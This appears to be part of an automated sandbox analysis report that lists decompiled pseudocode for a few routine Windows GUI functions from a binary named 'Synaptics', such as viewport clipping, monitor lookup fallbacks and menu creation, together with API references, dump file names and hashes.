                                                                                                                                                                                                                            • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c2bd60ce560c34ec15292e01b66b22b42b6ec1e64ee9c7bd280641d29b5e087
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				struct HDC__* _t47;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_t36 = __eax;
                                                                                                                                                                                                                            				_push(_t50);
                                                                                                                                                                                                                            				_push(0x43b326);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t50 + 0xfffffff4;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(__eax + 8));
                                                                                                                                                                                                                            					_v8 = 0xb;
                                                                                                                                                                                                                            					_t31 =  *0x49dc4c; // 0x422f30
                                                                                                                                                                                                                            					E00406A70(_t31,  &_v16);
                                                                                                                                                                                                                            					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
                                                                                                                                                                                                                            				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
                                                                                                                                                                                                                            				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
                                                                                                                                                                                                                            				_pop(_t42);
                                                                                                                                                                                                                            				 *[fs:eax] = _t42;
                                                                                                                                                                                                                            				_push(0x43b32d);
                                                                                                                                                                                                                            				return E004049C0( &_v16);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipIntersectLoadRectStringViewport
                                                                                                                                                                                                                            • String ID: 0/B
                                                                                                                                                                                                                            • API String ID: 2734429277-1373906003
                                                                                                                                                                                                                            • Opcode ID: dd4e2505df968acfab6a3d175d575ed0f78135dd417b7fa3dcb2f09e0321a6e9
                                                                                                                                                                                                                            • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd4e2505df968acfab6a3d175d575ed0f78135dd417b7fa3dcb2f09e0321a6e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043B338(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct tagRECT _v21;
                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v5 = 1;
                                                                                                                                                                                                                            				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                                                                                                                                                                                            				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                                                                                                                                                                                            				if(_t45 <= 0) {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					_v5 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t45 = _t45 - 1;
                                                                                                                                                                                                                            						_t40 = E0041AC6C(_t44, _t45);
                                                                                                                                                                                                                            						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E0043A91C(_t40,  &_v40);
                                                                                                                                                                                                                            							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                                                                                                                                                                                            							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                            					} while (_t45 > 0);
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L6:
                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$EqualIntersect
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3291753422-2766056989
                                                                                                                                                                                                                            • Opcode ID: 01dbe2ffe655930e8f7d0d4300ba91ed27844ee93d0c63831fe6078eb240f3e5
                                                                                                                                                                                                                            • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01dbe2ffe655930e8f7d0d4300ba91ed27844ee93d0c63831fe6078eb240f3e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t19 = _a12;
                                                                                                                                                                                                                            				if( *0x49e92b != 0) {
                                                                                                                                                                                                                            					_t16 = 0;
                                                                                                                                                                                                                            					if((_t19 & 0x00000003) != 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						_t16 = 0x12340042;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t21 = _a4;
                                                                                                                                                                                                                            						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t18 =  *0x49e90c; // 0x42c794
                                                                                                                                                                                                                            					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
                                                                                                                                                                                                                            					_t16 =  *0x49e90c(_a4, _a8, _t19);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7E2
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7F4
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromPoint
                                                                                                                                                                                                                            • API String ID: 1792783759-1072306578
                                                                                                                                                                                                                            • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C66C(intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr* _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				signed int _t17;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t17 = _a8;
                                                                                                                                                                                                                            				_t14 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92a != 0) {
                                                                                                                                                                                                                            					_t19 = 0;
                                                                                                                                                                                                                            					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                                                                                                                                                                                            						_t19 = 0x12340042;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t16 =  *0x49e908; // 0x42c66c
                                                                                                                                                                                                                            					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
                                                                                                                                                                                                                            					_t19 =  *0x49e908(_t14, _t17);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t19;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6BD
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6C9
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromRect
                                                                                                                                                                                                                            • API String ID: 1792783759-4033241945
                                                                                                                                                                                                                            • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AE70(void* __eax) {
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __eax;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
                                                                                                                                                                                                                            					_t17 =  *0x449b38; // 0x449b84
                                                                                                                                                                                                                            					if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
                                                                                                                                                                                                                            						E00449F18();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0044AC00(_t16);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return  *((intOrPtr*)(_t16 + 0x34));
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMenu$Popup
                                                                                                                                                                                                                            • String ID: .B
                                                                                                                                                                                                                            • API String ID: 257293969-2011479308
                                                                                                                                                                                                                            • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                                                            • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%